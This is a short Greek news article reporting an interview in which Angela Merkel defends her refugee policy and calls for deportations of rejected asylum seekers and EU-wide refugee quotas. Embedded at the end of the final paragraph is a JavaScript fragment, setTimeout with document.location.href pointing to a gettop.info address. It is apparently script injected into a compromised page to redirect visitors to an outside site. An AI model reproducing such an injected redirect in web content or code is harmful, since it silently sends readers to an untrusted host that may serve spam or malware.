Μέρκελ: Δεν άλλαξα πολιτική στο προσφυγικό

0
9

 

Σε συνέντευξή της στη Suchsische Zeitung καγκελάριος Άνγκελα Μέρκελ υπεραμύνθηκε της προσφυγικής της πολιτικής τονίζοντας «δεν άλλαξα την πολιτική μου στο προσφυγικό, έκανα πολιτική όμως. Δεν βλέπω κάποια αλλαγή, αλλά μια συνεπή δουλειά πάρα πολλών ανθρώπων».

«Έπρεπε να μάθουμε πολλά από το περασμένο καλοκαίρι, αυτό ήταν αναγκαίο, έπρεπε να προστατεύουμε τα εξωτερικά σύνορα της Ευρώπης, εάν θέλουμε να έχουμε ελευθερία διακίνησης εντός της Ευρώπης. Το ίδιο αναγκαίο είναι να ασχοληθούμε με τις αιτίες οι οποίες δημιουργούν την φυγή τους. Και αυτό έπρεπε να το μάθουμε», δήλωσε η κυρία Μέρκελ.

Και προσέθεσε:»Τώρα πρέπει να ασχοληθούμε με την επαναπροώθηση όσων έχουν αιτηθεί άσυλο στη Γερμανία και έχει απορριφθεί. Στο θέμα αυτό πρέπει να προχωρήσουμε με μεγαλύτερη συνέπεια«.

Για λόγους ανθρωπιστικούς όμως, όσοι φεύγουν λόγω πολέμου ή της τρομοκρατίας στις χώρες τους απαιτείται να ορισθούν «νόμιμα ποσοστά», ώστε να κατανεμηθούν αναλογικά σε όλες τις χώρες της Ευρωπαϊκής Ένωσης όσοι αναζητούν προστασία » επεσήμανε η καγκελάριος στη σαξονική εφημερίδα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here